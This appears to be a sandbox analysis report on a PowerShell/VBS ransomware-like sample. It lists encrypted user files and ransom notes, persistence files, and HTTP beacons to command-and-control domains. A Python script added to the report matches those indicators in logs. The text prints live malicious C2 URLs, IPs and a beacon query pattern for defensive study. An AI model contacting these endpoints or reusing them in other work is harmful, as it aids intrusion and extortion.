HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2304
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US

Files activity

Executable files
0
Suspicious files
51
Text files
25
Unknown types
1

Dropped files

PID Process Filename Type MD5 SHA256
2304 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF18e2d9.TMP binary 4c55fb736b5823d4c1f277be226111d3 a7471f464e931aad365e5a751019f5f21931417f3dcd221adc662ed7215eee5b
2460 powershell.exe C:\Users\admin\Downloads\cemployees.jpg.df646e binary 7e7cd4423ac50bdf9343d7d3b45896f5 52192a830454a1565597b2c3cadde160d4d3dadd4c6ac11542a46574f1a193d3
2304 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KN2H55GCR5V28921KUAW.temp –– –– ––
1952 iexplore.exe C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{2087FE68-EA9F-11E9-9008-5254004AAD21}.dat binary 7b9dc89acf4e6dc85672cc8de72a4ba9 3fc7c3cac23fda193744e65948731e0cfeb0f369df7697076115a7b28291cd99
1952 iexplore.exe C:\Users\admin\AppData\Local\Temp\~DFBBF06F476E06D6FD.TMP –– –– ––
2744 powershell.exe C:\Users\admin\AppData\Local\Temp\AFX50058.tmp text 210a5b7377e1cceb9610c08304f286a6 f79411ef3f7b07479f9bc4e8ef919cf9ef00d4ac483c28a2892fefebb6368422
2744 powershell.exe C:\Users\Public\Libraries\thumbcache_64.db text 3980c8949e5be132bd25ef40aaf86d61 ec4eb299c516298e0afd51b5a62d176dfa7985675fa7db0659efd653ea97082d
2744 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms binary 4c55fb736b5823d4c1f277be226111d3 a7471f464e931aad365e5a751019f5f21931417f3dcd221adc662ed7215eee5b
2744 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF17d486.TMP binary 4c55fb736b5823d4c1f277be226111d3 a7471f464e931aad365e5a751019f5f21931417f3dcd221adc662ed7215eee5b
2744 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BH7YRIA4FEJPZRNQ5C74.temp –– –– ––
1952 iexplore.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\search[1].json text 449f61c84cd2f7342f95403c908c0603 19170bd75edc0b5183a2f9fcc3001d9d222deff61e5915ad1127b65ab581a2a1
1952 iexplore.exe C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\it-IT.1 binary 5a34cb996293fde2cb7a4ac89587393a c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
1952 iexplore.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\suggestions[1].it-IT binary 5a34cb996293fde2cb7a4ac89587393a c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
1952 iexplore.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\H6ON485B.txt text 607e8556a0f28faf1faef5f8e8fdb407 b60855e2e3a3acbd5e6533a7ad62f615c689e87606c49ad57fb35a0f5d4f1799
1952 iexplore.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\L4OLDDDB.txt –– –– ––
1952 iexplore.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\WIL8EEEE.txt –– –– ––
1952 iexplore.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\urlblockindex[1].bin binary fa518e3dfae8ca3a0e495460fd60c791 775853600060162c4b4e5f883f9fd5a278e61c471b3ee1826396b6d129499aa7
1952 iexplore.exe C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml xml 7c0e98813a48d3d9d55c1037a6d2fa68 5b8274093f4b5529f6f7b0977167fd202c1d6fc1a7a9d3931a1b04c3ee8b8cad
1952 iexplore.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\iecompatviewlist[1].xml xml 7c0e98813a48d3d9d55c1037a6d2fa68 5b8274093f4b5529f6f7b0977167fd202c1d6fc1a7a9d3931a1b04c3ee8b8cad
1952 iexplore.exe C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico –– –– ––
1952 iexplore.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\favicon[1].ico image 9fb559a691078558e77d6848202f6541 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
1952 iexplore.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\favicon[1].ico –– –– ––
2460 powershell.exe C:\Users\admin\AppData\Local\Temp\quanto98.tmp text 4ee5a4d89c05fa6404ea5ff3fcee699b f3ede7f5ab7aaaaff6f9211d30121eddf78ec8b31a7b5924ac134b18540e4510
2460 powershell.exe C:\Users\Public\Videos\Sample Videos\READ_ME_NOW.htm html 6a32db37bc63024a29180927fade54dc c0867739a3ee4a5e7afecb66cdde050d0546f8c99715e683a810ea1048fc9cd0
2460 powershell.exe C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.df646e –– –– ––
2460 powershell.exe C:\Users\Public\Videos\Sample Videos\Wildlife.wmv –– –– ––
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.df646e binary f5a579c6c4fae80dce4be54ba93ec8c5 412266211e75cbfa161eebcc6847c550980c058e3f2746c329718e1bbc15faec
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg –– –– ––
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.df646e binary 6c4c7de9f79f4bf4753f293d226b2ce1 db8262bcd50722f0726b3fb8abd7a73bf13d4431b2d6f95fc185103b5a051bea
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg –– –– ––
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.df646e binary cfecc224d691ccd582069da79e58a99a 887f4f85a29679a75bef7ff2066fbaa104b6ac7ae30ca216ce40da8bb5f3df73
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg binary cfecc224d691ccd582069da79e58a99a 887f4f85a29679a75bef7ff2066fbaa104b6ac7ae30ca216ce40da8bb5f3df73
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.df646e binary badf9083a0d9351839dfa648d981c4c7 de00be60d6eaeac980f21de07385838c82a0165c2f0efd3d8d1042f57e1f7e2a
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Koala.jpg –– –– ––
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.df646e binary 4d0185b8e255633b5e7551659f678352 0e3e347b6f06440da9ea71b801a409042124469f7d54a801e7592dbcd485b125
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg –– –– ––
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.df646e binary 3a85efdce6fd29eae8f6dec0b54509e6 ff1e4c18f1a8a1cfa8f0c068a5ed74d96bdf2857ca1a730bd27add6433e32428
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg –– –– ––
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.df646e binary 6a5071e5d377d97c2bf3cde39ba8b71e fd38fbdaadfe962aac8339cd5c13d9460bd942684859f92f792ad60da65e2151
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Desert.jpg –– –– ––
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\READ_ME_NOW.htm html 6a32db37bc63024a29180927fade54dc c0867739a3ee4a5e7afecb66cdde050d0546f8c99715e683a810ea1048fc9cd0
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.df646e binary 90dc856aa17b6575a915421e0d570ef6 551c3d47b27fd60374e0f8c223dae5bc5742cae21e9fd1b405df54cbac087ff9
2460 powershell.exe C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg –– –– ––
2460 powershell.exe C:\Users\admin\Pictures\withoutgeorge.jpg.df646e binary 775a5fd25b990bf57f7289332725c37f 36bcb43c0b6cb808f3584d1c1df44f3cfa6a20a179785cb30c44c403a2d6fa1b
2460 powershell.exe C:\Users\admin\Pictures\withoutgeorge.jpg –– –– ––
2460 powershell.exe C:\Users\admin\Pictures\loginagency.png.df646e binary d3564cfe200499818d2f4d8c17209d5f 5239e97606e0863ad02992f841232bb6cf9c60feeeb4a07eb04d3ae24c0d5ee2
2460 powershell.exe C:\Users\admin\Pictures\loginagency.png –– –– ––
2460 powershell.exe C:\Users\admin\Pictures\italyu.jpg.df646e binary d918f13baae54728269d777398a41853 a9421216c95a07a4ab2d3417653b6cf8586b4bf43fde5b640ce323401411f786
2460 powershell.exe C:\Users\admin\Pictures\italyu.jpg –– –– ––
2460 powershell.exe C:\Users\admin\Pictures\ideaseveral.jpg.df646e binary 214d2df57fec9fbc48447521caa172a7 54521915fba13a066dfc333b16228499ddd50b9bc5e72153094b46933c75b897
2460 powershell.exe C:\Users\admin\Pictures\ideaseveral.jpg –– –– ––
2460 powershell.exe C:\Users\admin\Pictures\apractual.png.df646e binary 1342b85002b5c08f66492cf71596a2c4 eee8b2ed5b9c0afdffd4d490eb5853c424ccc9d1410aae079e584c438c1fc7be
2460 powershell.exe C:\Users\admin\Pictures\apractual.png –– –– ––
2460 powershell.exe C:\Users\admin\Pictures\READ_ME_NOW.htm html 6a32db37bc63024a29180927fade54dc c0867739a3ee4a5e7afecb66cdde050d0546f8c99715e683a810ea1048fc9cd0
2460 powershell.exe C:\Users\admin\Pictures\advertisingstation.jpg.df646e binary 3379e20d7e54e9acfc0e2023451f66b1 3d6810848359a0bc3c4599d94116f8d8cc776d97b0258c724165c5c019da5e20
2460 powershell.exe C:\Users\admin\Pictures\advertisingstation.jpg –– –– ––
2460 powershell.exe C:\Users\admin\Downloads\tommember.png.df646e binary 1c4339cf962a1b73aad1822214d9a9f0 77ac9e370e8acef4c6c4b3b392f8153af851634e562d22281ffa1d6c17d932f3
2460 powershell.exe C:\Users\admin\Downloads\tommember.png –– –– ––
2460 powershell.exe C:\Users\admin\Downloads\rangeavailable.jpg.df646e binary 50b8039d914126a4f4d4943da4eee247 d6d1cfa6b086c1e4ce8e970c2eab6649a0f5f1fc6d3ce9000a5170732cd1b804
2460 powershell.exe C:\Users\admin\Downloads\rangeavailable.jpg –– –– ––
2460 powershell.exe C:\Users\admin\Downloads\ppperformance.jpg.df646e binary 18691ff0b10fa95510577532af1baa0d 6ef164e878dfa263c0b73cba3869f77422523462b1587ffdadfe49a17fc77057
2460 powershell.exe C:\Users\admin\Downloads\ppperformance.jpg –– –– ––
2460 powershell.exe C:\Users\admin\Downloads\fullsea.png.df646e binary 33ed803461d64e23d04caabc3eca3e98 a4a3f53b65ff91518dfbe52152dae7c49dd65e0209a33cff2d07e0b03d72f0bd
2460 powershell.exe C:\Users\admin\Downloads\fullsea.png –– –– ––
2460 powershell.exe C:\Users\admin\Downloads\freejohn.png.df646e binary 59f4d321807a3431f1eb7478e8c8c66f afe7a16b49b05a1afecd26d1742e2741cb3e350fe5069d1971f8d98934032770
2460 powershell.exe C:\Users\admin\Downloads\freejohn.png –– –– ––
2460 powershell.exe C:\Users\admin\AppData\Local\Temp\quanto98.tmp text 0707277a5493140978ad2ccfcc4206e5 a85d30e04b7d1a2f4f07d8452f96a16309737dea3584c47992100862dd291f29
2460 powershell.exe C:\Users\admin\Downloads\READ_ME_NOW.htm html 6a32db37bc63024a29180927fade54dc c0867739a3ee4a5e7afecb66cdde050d0546f8c99715e683a810ea1048fc9cd0
2304 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms binary 4c55fb736b5823d4c1f277be226111d3 a7471f464e931aad365e5a751019f5f21931417f3dcd221adc662ed7215eee5b
2460 powershell.exe C:\Users\admin\Downloads\cemployees.jpg –– –– ––
2460 powershell.exe C:\Users\admin\Documents\providingletters.rtf.df646e binary 6fc8e0d2e00efc8786e9bc8434e88da9 d80ab1371525b095154e95a5b1cf3833f490f0fa7709781be5069ca0b332d69c
2460 powershell.exe C:\Users\admin\Documents\providingletters.rtf –– –– ––
2460 powershell.exe C:\Users\admin\Documents\otherwiselord.rtf.df646e binary a23c29ef3b9a8e519d2daba30c1bc5c4 8402c55a77c839e43dae25490f7f96442c2d02155337db58fbebb57bda8ea98f
2460 powershell.exe C:\Users\admin\Documents\otherwiselord.rtf –– –– ––
2460 powershell.exe C:\Users\admin\Documents\historyco.rtf.df646e binary 4296a2eb0820d769d38bb2a82b43bb31 11bf6f0347254234f914515737e9b1eff04b8da959aa04ab144d73fbf9ed92b2
2460 powershell.exe C:\Users\admin\Documents\historyco.rtf –– –– ––
2460 powershell.exe C:\Users\admin\Documents\billbid.rtf.df646e binary 591ad55fb5bb78e9b2bfa6c6b6703e6e e905dd2aea131d15de4804b4295052077fbefce09f77bd82fcde2e8b3a979285
2460 powershell.exe C:\Users\admin\Documents\billbid.rtf –– –– ––
2460 powershell.exe C:\Users\admin\Documents\READ_ME_NOW.htm html 6a32db37bc63024a29180927fade54dc c0867739a3ee4a5e7afecb66cdde050d0546f8c99715e683a810ea1048fc9cd0
2460 powershell.exe C:\Users\admin\Documents\baskettuesday.rtf.df646e binary 92a5a4c08f7d6fc65959ccf8b8b04d7b fb4d223ef8fcf78ef6125f6d7d362502d1adc35949b8a0a72971c27dbcfa6af3
2460 powershell.exe C:\Users\admin\Documents\baskettuesday.rtf –– –– ––
2460 powershell.exe C:\Users\admin\Documents\Outlook Files\Outlook.pst.df646e binary 33d1542d91acc5a1c2333f8fb6d1ddc8 801992927608c9d6ca0928966cc1635cd60c68fe59d0a608aa33db4b2723a98b
2460 powershell.exe C:\Users\admin\Documents\Outlook Files\Outlook.pst –– –– ––
2460 powershell.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst.df646e binary e34fdc7aa937eaea3bf8305b65e85371 45b216abfe91ca1ba87b7c178336295621a45f8b7de1f6979df88dca970184de
2460 powershell.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst –– –– ––
2460 powershell.exe C:\Users\admin\Documents\Outlook Files\READ_ME_NOW.htm html 6a32db37bc63024a29180927fade54dc c0867739a3ee4a5e7afecb66cdde050d0546f8c99715e683a810ea1048fc9cd0
2460 powershell.exe C:\Users\admin\Documents\Outlook Files\[email protected] binary 6b79ce6144ee11cef8309d46be733094 2894aeaa875cc0946519cb0f3d9cd3e7eacd82befae652d9cbf8b03d33361c4d
2460 powershell.exe C:\Users\admin\Documents\Outlook Files\[email protected] –– –– ––
2460 powershell.exe C:\Users\admin\Desktop\thinkingvillage.png.df646e binary b92976b62fb4bd6d1029a247df4556f8 9c30ab3c163044e624313984f96ed504d450309f2b9df19f0c6fd3be31bffa08
2460 powershell.exe C:\Users\admin\Desktop\thinkingvillage.png –– –– ––
2460 powershell.exe C:\Users\admin\Desktop\subjectmy.rtf.df646e binary f57f27ed523a808fcb6788b27430d9cc 0344ccbccb073e48d602da94a2c46fd95f6de3b0a0b3249241bf5407f8bcd7a5
2460 powershell.exe C:\Users\admin\Desktop\subjectmy.rtf –– –– ––
2460 powershell.exe C:\Users\admin\Desktop\programsrace.png.df646e binary 73579fc53defe2d68aeee701f73fbc65 b57f0f87c51e9c5aa923945a3fbb91a752f9296f6fe8c134b7151ee77c98116a
2460 powershell.exe C:\Users\admin\Desktop\programsrace.png –– –– ––
2460 powershell.exe C:\Users\admin\Desktop\octoberrules.png.df646e binary 5b7c44fa0c4ff23738d0ad8038dc44c3 b6338ae2b2fb315cc5cc6068f9c47553fde34a733b53f88320c77e53097b9f66
2460 powershell.exe C:\Users\admin\Desktop\octoberrules.png –– –– ––
2460 powershell.exe C:\Users\admin\Desktop\nomd.rtf.df646e binary d4b0c67c2d8ed79d17bae8c78146027e 35baeac9d170201651a1eae13bde2c71731c0dbde30d91a8b469846596a0a2b7
2460 powershell.exe C:\Users\admin\Desktop\nomd.rtf –– –– ––
2460 powershell.exe C:\Users\admin\Desktop\networkingnorth.rtf.df646e binary 3eaccb4a299e9f9b19563818420f0ecb 53bf39d2447ae1977a0d6142decb465f4b4aca3521315187e82c6c3323b23518
2460 powershell.exe C:\Users\admin\Desktop\networkingnorth.rtf –– –– ––
2460 powershell.exe C:\Users\admin\Desktop\marketmake.rtf.df646e binary 55d6785a363e357701affa779cdc2670 ca8af85c84f0ad02180df2fa8b3360c8d857b463a641f8aca84a8bf97244a077
2460 powershell.exe C:\Users\admin\Desktop\marketmake.rtf –– –– ––
2460 powershell.exe C:\Users\admin\Desktop\iiwindow.png.df646e binary 9e7150d5abcc55cf8b44d1286430a920 278cfe80eabf8860df37be66584f0a241cde7d18324a6e311a2f1c1151f7b2e6
2460 powershell.exe C:\Users\admin\Desktop\iiwindow.png –– –– ––
2460 powershell.exe C:\Users\admin\Desktop\hugeuseful.png.df646e binary b6dea066387241a6dd9653e9ad4bdb8a 7ce4087098378cce754e20f2f04a0acd280733eabbb8b4b1cc7c14a89d4c795e
2460 powershell.exe C:\Users\admin\Desktop\hugeuseful.png –– –– ––
2460 powershell.exe C:\Users\admin\Desktop\chinateen.rtf.df646e binary 8e205eab11510d8d9b7401acfdc09c08 f0733fdd8a4b3713c9ace2d0b4d2af474951f3c878c89f745b7cf415597f9797
2460 powershell.exe C:\Users\admin\Desktop\chinateen.rtf –– –– ––
2460 powershell.exe C:\Users\admin\Desktop\cellsthird.jpg.df646e binary b9036ba1b29c3f2f950fe71b97c7784f 310fb58bbee51882e1a5d6845bcb0fecbe9699e7675f15548d85c9b79a43372d
2460 powershell.exe C:\Users\admin\Desktop\cellsthird.jpg –– –– ––
2460 powershell.exe C:\Users\admin\AppData\Local\Temp\quanto98.tmp text 2b9b17984c63269dd2222d2616c4dc8a 542b799b79f77798a498d3878d49650113b653dbf1a81f08a3d29e2af50d2d04
2460 powershell.exe C:\Users\admin\Desktop\READ_ME_NOW.htm html 6a32db37bc63024a29180927fade54dc c0867739a3ee4a5e7afecb66cdde050d0546f8c99715e683a810ea1048fc9cd0
2460 powershell.exe C:\Users\admin\Desktop\advancedchicago.png.df646e binary 911d3f031f4df03b0af0f2559fd8fc2c 39193a8166511f63499bab4388894f4111c2f200243bb34e4acfe7b33d96955b
2460 powershell.exe C:\Users\admin\Desktop\advancedchicago.png –– –– ––
2460 powershell.exe C:\Users\admin\AppData\Local\Temp\quanto98.tmp text 0782285873be7aad0b1a8600ca57922e 889225739fb8bfd9581f191c003d9b46dcf81a5114927fa3b866cc575b6766aa
2460 powershell.exe C:\Users\Public\OracleKit\w00log03.tmp text d2151d420c86308a91c9fe0d7b9997f4 5fe8b28518548c4fc19ff958f5e84bc02eb21550e94301a09ac4e2efd03d6ff4
2460 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsApplicationService.lnk lnk cafd66d2e1ec763072942095f53f40ed 2e350e1aa2101cf05654585e48bd906b71a9676d3cc8162ce6100371e67f86af
2460 powershell.exe C:\Users\Public\Libraries\WindowsIndexingService.vbs text e357f8b2f0110c7153bdf02a355c61b6 4eb5b4bb452cf58e9f4980f75db2cf51b42b2909c593384c416b7895f948eaa0
2296 vlc.exe C:\Users\admin\AppData\Roaming\vlc\vlcrc text fb9b36ccdf9f0e31539438938f75d197 dfde1f8fb276e72fdcd797ec620832509fc5c5834fa6ea1e683a6f24d9965558
2296 vlc.exe C:\Users\admin\AppData\Roaming\vlc\vlcrc.2296 –– –– ––
2296 vlc.exe C:\Users\admin\AppData\Local\Temp\VLCEDEE.tmp –– –– ––
2296 vlc.exe C:\Users\admin\AppData\Local\Temp\VLCEDED.tmp –– –– ––
2296 vlc.exe C:\Users\admin\AppData\Roaming\vlc\vlc-qt-interface.ini text 410e10ae13b877d23291d14c7b14be97 9a7c5f346c93e61fc3521ff0a6e9a1c515ff6134504c5a40f83b6b4f72308bb9
2296 vlc.exe C:\Users\admin\AppData\Local\Temp\VLCEDCD.tmp –– –– ––
2296 vlc.exe C:\Users\admin\AppData\Local\Temp\VLCEDCC.tmp –– –– ––
2296 vlc.exe C:\Users\admin\AppData\Local\Temp\VLCEDCB.tmp –– –– ––
2296 vlc.exe C:\Users\admin\AppData\Local\Temp\VLCEDCA.tmp –– –– ––
2296 vlc.exe C:\Users\admin\AppData\Local\Temp\VLCEDC9.tmp –– –– ––
2296 vlc.exe C:\Users\admin\AppData\Local\Temp\VLCEDB8.tmp –– –– ––
2296 vlc.exe C:\Users\admin\AppData\Local\Temp\VLCEDB7.tmp –– –– ––
2296 vlc.exe C:\Users\admin\AppData\Local\Temp\VLCEDB6.tmp –– –– ––
2460 powershell.exe C:\Users\Public\Libraries\961600 text e357f8b2f0110c7153bdf02a355c61b6 4eb5b4bb452cf58e9f4980f75db2cf51b42b2909c593384c416b7895f948eaa0
2296 vlc.exe C:\Users\admin\AppData\Local\Temp\VLCE662.tmp –– –– ––
2460 powershell.exe C:\Users\admin\AppData\Local\Temp\ramst007.mp3 –– –– ––
2460 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms binary 4c55fb736b5823d4c1f277be226111d3 a7471f464e931aad365e5a751019f5f21931417f3dcd221adc662ed7215eee5b
2460 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF158a38.TMP binary 4c55fb736b5823d4c1f277be226111d3 a7471f464e931aad365e5a751019f5f21931417f3dcd221adc662ed7215eee5b
2460 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HL3ZVOAYE3NWX44LR2D8.temp –– –– ––

Network activity

HTTP(S) requests
6
TCP/UDP connections
21
DNS requests
21
Threats
1

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
2460 powershell.exe GET 200 31.214.157.155:80 http://ceco.myheritageins.com/?need=streetm&vid=vbs4&4643 NL text malicious
2460 powershell.exe GET 200 31.214.157.155:80 http://ceco.myheritageins.com/?need=aegzfej&vid=vbs4& NL text malicious
2460 powershell.exe POST 200 185.158.248.151:80 http://ceco.jasonrsheldon.com/ RO text text malicious
2460 powershell.exe POST 200 185.158.248.151:80 http://ceco.jasonrsheldon.com/ RO text text malicious
2744 powershell.exe POST 200 185.212.47.91:80 http://cdn.unitycareers.com/ DE text text malicious
2744 powershell.exe POST 200 185.212.47.91:80 http://cdn.unitycareers.com/ DE text text malicious

Connections

PID Process IP ASN CN Reputation
2460 powershell.exe 207.241.224.2:443 Internet Archive US unknown
2460 powershell.exe 207.241.228.42:443 Internet Archive US unknown
2460 powershell.exe 31.214.157.155:80 easystores GmbH NL malicious
2460 powershell.exe 185.158.248.151:80 M247 Ltd RO malicious
1952 iexplore.exe 204.79.197.200:443 Microsoft Corporation US whitelisted
1952 iexplore.exe 152.199.19.161:443 MCI Communications Services, Inc. d/b/a Verizon Business US whitelisted
2944 IEXPLORE.EXE 152.199.19.161:443 MCI Communications Services, Inc. d/b/a Verizon Business US whitelisted
1952 iexplore.exe 23.197.15.213:443 Akamai Technologies, Inc. NL whitelisted
1952 iexplore.exe 204.79.197.203:443 Microsoft Corporation US whitelisted
1952 iexplore.exe 13.92.246.37:443 Microsoft Corporation US whitelisted
2744 powershell.exe 185.212.47.91:80 23media GmbH DE malicious

DNS requests

Domain IP Reputation
archive.org 207.241.224.2 whitelisted
ia802302.us.archive.org 207.241.228.42 unknown
ceco.myheritageins.com 31.214.157.155 malicious
ceco.jasonrsheldon.com 185.158.248.151 unknown
api.bing.com 13.107.5.80 whitelisted
www.bing.com 204.79.197.200 whitelisted
iecvlist.microsoft.com 152.199.19.161 whitelisted
r20swj13mr.microsoft.com 152.199.19.161 whitelisted
ieonline.microsoft.com 204.79.197.200 whitelisted
go.microsoft.com 23.197.15.213 whitelisted
www.msn.com 204.79.197.203 whitelisted
query.prod.cms.msn.com 13.92.246.37 whitelisted
cdn.unitycareers.com 185.212.47.91 malicious
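
The HTTP, Connections and DNS tables above give three hosts and three addresses that the two powershell.exe instances (PIDs 2460 and 2744) talked to, plus two GET URLs of the form /?need=<token>&vid=vbs4&. The Python below is an added example, not anything from the report, that turns those into a matcher and runs it over constructed proxy and DNS log lines. The log format is invented for the example, and treating the query shape as a reusable pattern rests on only the two observed URLs, so that is an assumption as well.

```python
"""Match proxy and DNS log lines against the network indicators of this report.
Added example, not ANY.RUN's code; the log lines below are constructed."""
import re
from urllib.parse import urlsplit

# Indicators copied from the tables above (entries the report marks malicious).
C2_DOMAINS = {"ceco.myheritageins.com", "ceco.jasonrsheldon.com", "cdn.unitycareers.com"}
C2_IPS = {"31.214.157.155", "185.158.248.151", "185.212.47.91"}

# Query shape of the two GET requests above: "need=<token>&vid=vbs4&...".
# Generalising two samples into a pattern is this example's assumption.
BEACON_QUERY = re.compile(r"^need=[A-Za-z0-9]+&vid=vbs4&")

# Constructed log: "proxy <client> <method> <url>" and "dns <client> <qname> <answer>".
SAMPLE_LOG = """\
proxy 10.0.0.7 GET http://ceco.myheritageins.com/?need=streetm&vid=vbs4&4643
proxy 10.0.0.7 POST http://ceco.jasonrsheldon.com/
proxy 10.0.0.9 GET http://www.bing.com/search?q=ftcode
proxy 10.0.0.9 GET http://example.org/?need=abc&vid=vbs4&
dns 10.0.0.7 cdn.unitycareers.com 185.212.47.91
dns 10.0.0.9 www.msn.com 204.79.197.203
"""


def check_url(url):
    """Reasons a URL matches: known C2 host, known C2 IP, or the beacon query shape."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []
    if host in C2_DOMAINS:
        reasons.append("c2-domain")
    if host in C2_IPS:
        reasons.append("c2-ip")
    if BEACON_QUERY.match(parts.query):
        reasons.append("beacon-query")
    return reasons


def check_dns(qname, answer):
    """Reasons a DNS record matches: the name or the resolved address is a known C2."""
    reasons = []
    if qname.lower() in C2_DOMAINS:
        reasons.append("c2-domain")
    if answer in C2_IPS:
        reasons.append("c2-ip")
    return reasons


def scan(log_text):
    """Return a list of (client, indicator, reasons) for every matching line."""
    hits = []
    for line in log_text.splitlines():
        f = line.split()
        if len(f) != 4:
            continue
        if f[0] == "proxy":
            indicator, reasons = f[3], check_url(f[3])
        elif f[0] == "dns":
            indicator, reasons = f[2], check_dns(f[2], f[3])
        else:
            continue
        if reasons:
            hits.append((f[1], indicator, reasons))
    return hits


def infected_clients(hits):
    """Distinct client addresses that produced at least one hit."""
    return sorted({client for client, _, _ in hits})


if __name__ == "__main__":
    for client, indicator, reasons in scan(SAMPLE_LOG):
        print(client, indicator, ",".join(reasons))
```

The fourth sample line hits on the query shape alone, against a host that is not in the lists; that is the point of keeping the pattern separate from the domain and IP sets, since it survives a change of C2 hostname. The archive.org connections in the Connections table (PID 2460 to 207.241.224.2 and 207.241.228.42) are deliberately not in the sets: a shared public host is a poor block indicator, and the report only shows that powershell.exe reached it, which is better expressed as a process-to-destination rule on the endpoint than as a network blocklist entry.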

Threats

No threats detected.

Debug output strings

Process Message
mmc.exe ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn